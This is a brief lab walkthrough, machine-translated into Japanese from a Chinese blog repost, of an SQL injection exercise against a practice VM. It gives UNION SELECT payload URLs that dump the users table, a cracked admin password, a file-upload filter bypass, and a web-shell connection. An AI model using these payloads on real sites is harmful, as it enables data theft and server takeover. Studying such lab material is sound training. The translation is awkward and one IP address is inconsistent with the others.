実験5
Experiment 5
1.SQLインジェクション
まず、仮想マシンをセットアップします。 kaliで現在のネットワークセグメントをスキャンします。 192.168.1.130の疑わしいIPアドレスを見つけます。
仮想マシンによって提供されるWebページを開きます。ディスカバリーを使用して、SQLインジェクションポイントを作成します。
http://192.168.1.130/cat.php?id=1
http://192.168.1.130/cat.php?id=1 '
order byステートメントを使用して、Webサイトのバックグラウンドデータベーステーブルの列数を試してください。 5で注文すると、ページが正しく報告されません。したがって、クエリには4列の要素が含まれます。
フェデレーションクエリを使用して、Webページの表示ビットを表示します
見つかった2はエコー位置であり、データベースの名前がフォトブログとして見つかりました
http://192.168.1.130/cat.php?id=-2 union select 1、group_concat(table_name)、3,4 from information_schema.tables where table_schema = ‘photoblog’
データベースのテーブルを確認すると、usersテーブルが役立つことがわかります。
http://192.168.1.130/cat.php?id=-2 union select 1、group_concat(column_name)、3,4 from information_schema.columns where table_name = ‘users’
変数名id、login、passwordを使用して、usersテーブルの列名のクエリを続行します
ユーザーテーブルのデータを表示します。id= 1 login = admin password = 8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.138.134/cat.php?id=-1 union select 1、group_concat(id、0x23、login、0x23、password)、3,4 from users
MD5を復号化した後、パスワードP4ssw0rdを取得します
管理者ページにログインします
ファイルをアップロードして、nophpを見つけてください
サフィックス名を変更した後、それをバイパスして正常にアップロードできます。
カタログを入手して包丁でつなぐ
転載:https://www.cnblogs.com/p201521430045/p/8954402.html